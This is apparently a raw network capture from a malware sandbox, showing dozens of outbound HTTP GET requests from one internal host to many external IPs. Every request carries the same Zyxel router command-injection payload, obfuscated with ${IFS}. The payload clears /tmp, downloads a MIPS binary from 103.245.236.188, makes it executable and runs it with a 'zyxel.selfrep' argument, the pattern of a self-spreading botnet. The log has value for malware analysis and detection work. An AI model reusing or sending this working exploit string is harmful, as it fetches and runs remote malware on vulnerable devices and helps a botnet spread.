                                    Jan 13, 2024 19:02:32.131983042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4027192.168.2.135321271.235.181.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132020950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4028192.168.2.1337576110.177.131.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132060051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4029192.168.2.133364050.102.251.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132080078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4030192.168.2.1335970130.26.93.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132143021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4031192.168.2.134902285.152.14.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132189989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4032192.168.2.1341116222.139.166.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.132219076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4033192.168.2.1341948171.150.102.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149496078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4034192.168.2.1348134130.19.238.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149599075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4035192.168.2.1354332130.8.43.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149617910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4036192.168.2.1337254171.7.84.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149676085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4037192.168.2.1341980121.82.103.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149709940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4038192.168.2.1336768136.81.165.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149719000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4039192.168.2.1352028219.87.167.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149775028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4040192.168.2.1360990177.12.207.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149813890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4041192.168.2.133880662.109.10.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149832964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4042192.168.2.133278039.194.31.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149919987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4043192.168.2.1346202192.231.42.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149934053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4044192.168.2.1355314130.123.32.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.149966002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4045192.168.2.1349794152.247.163.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150012016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4046192.168.2.1356370125.31.111.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150024891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4047192.168.2.1343928201.66.125.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150067091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4048192.168.2.1335690217.181.226.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150077105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4049192.168.2.1345542118.146.177.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150118113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4050192.168.2.135000036.201.34.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150156021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4051192.168.2.1338674206.214.32.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150204897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4052192.168.2.1340552105.228.176.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150250912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4053192.168.2.135140262.152.16.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150331020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4054192.168.2.134950068.202.58.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150335073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4055192.168.2.135718454.36.124.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150357962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4056192.168.2.1360854223.108.96.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150387049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4057192.168.2.133962678.21.90.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150446892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4058192.168.2.1345696153.113.179.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150496006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4059192.168.2.1351910166.10.108.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150528908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4060192.168.2.1334844206.99.246.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150564909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4061192.168.2.1336028205.94.134.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150603056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4062192.168.2.1353082125.135.104.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150640011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4063192.168.2.135713052.13.180.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150684118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4064192.168.2.1357128200.21.225.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150712013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4065192.168.2.1338106174.250.206.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150758982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4066192.168.2.1360552124.171.77.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150789976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4067192.168.2.1342208112.180.105.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150826931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4068192.168.2.1339910106.102.137.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150878906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4069192.168.2.1345330158.6.255.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150928974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4070192.168.2.134668894.19.97.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.150958061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4071192.168.2.135526699.163.42.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151007891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4072192.168.2.1336004162.107.208.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151045084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4073192.168.2.1333102175.13.236.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151084900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4074192.168.2.136022623.157.210.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151113987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4075192.168.2.1341526152.61.31.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151163101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4076192.168.2.135523243.57.152.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151200056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4077192.168.2.134554446.65.45.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151235104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4078192.168.2.135757013.121.200.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151259899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4079192.168.2.134649853.175.184.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151308060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4080192.168.2.1344910125.178.149.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151348114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4081192.168.2.1339712201.40.232.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151377916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4082192.168.2.1348784180.73.159.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151422024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4083192.168.2.1342812199.255.49.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151443005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4084192.168.2.1337766170.137.138.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151477098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4085192.168.2.133792644.73.79.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151545048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4086192.168.2.134302881.83.18.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151593924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4087192.168.2.1358944175.144.225.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151607990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4088192.168.2.1336356195.237.76.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.151647091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4089192.168.2.1360530148.64.32.41443
                                    TimestampBytes transferredDirectionData
